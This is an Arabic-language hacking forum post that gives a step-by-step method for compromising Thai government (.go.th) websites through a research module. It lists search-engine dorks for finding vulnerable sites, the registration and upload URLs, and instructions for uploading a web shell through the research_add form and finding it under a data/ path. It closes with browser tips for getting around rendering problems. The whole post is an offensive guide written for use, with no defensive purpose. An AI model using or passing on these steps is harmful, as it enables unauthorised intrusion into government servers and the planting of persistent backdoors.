ثغرة خطيرة لاختراق المواقع الحكومية (research)

[barbaros]

السلام عليكم

Dork 1 :

كود:

site:go.th inurl:name=member+file=index

Dork 2:

كود:

site:go.th inurl:name=research

الصفحة الرئيسية:

كود:

http://www.xxx.go.th/?name=research

http://www.xxx.go.th/index.php?name=research

http://www.xxx.go.th/popup.php?name=research

لرفع الشيل اذهب إلى هذا الرابط:

كود:

http://www.xxx.go.th/?name=research&file=add&op=research_add

http://www.xxx.go.th/index.php?name=research&file=add&op=research_add

http://www.xxx.go.th/popup.php?name=research&file=add&op=research_add

إذا ظهرت رسالة الخطأ هذه:
[

التي تهني : "أنت لست عضوا"

يتوجب عليك التسجيل من هذا الرابط:

كود:

  
http://www.xxx.go.th/?name=member&file=index

http://www.xxx.go.th/index.php?name=member&file=index

http://www.xxx.go.th/popup.php?name=member&file=index

لرفع الشيل عليك بملأ الحقول كما في الصورة:

---------------------------------------------------

بعد ذلك ارجع إلى صفحة البداية لترى ملفك:

كود:

http://www.xxx.go.th/?name=research

http://www.xxx.go.th/index.php?name=research

http://www.xxx.go.th/popup.php?name=research

ثم اضغط على "FullText" كما في الصورة:

-----------------------------------------------------------------------------

انتظر عشر ثواني:

----------------------------------------------

ثم اضغط على download :

سيتم توجيهك الى رابط الشيل الذي يكون كهذا:

كود:

http://www.xxx.go.th/dontry/data/research_1340954535_z.php

ملاحظة مهمة: في كثير من الأحيان لا تعرض الصفحة بطريقة صحيحة فلا يظهر لك هيكل fckeditor لذا يتوجب عليك استخدام متصفح Opera لتجنب ذلك او استخدام الاضافات ك tamper data او auto fill


بالتوفيق للجميع.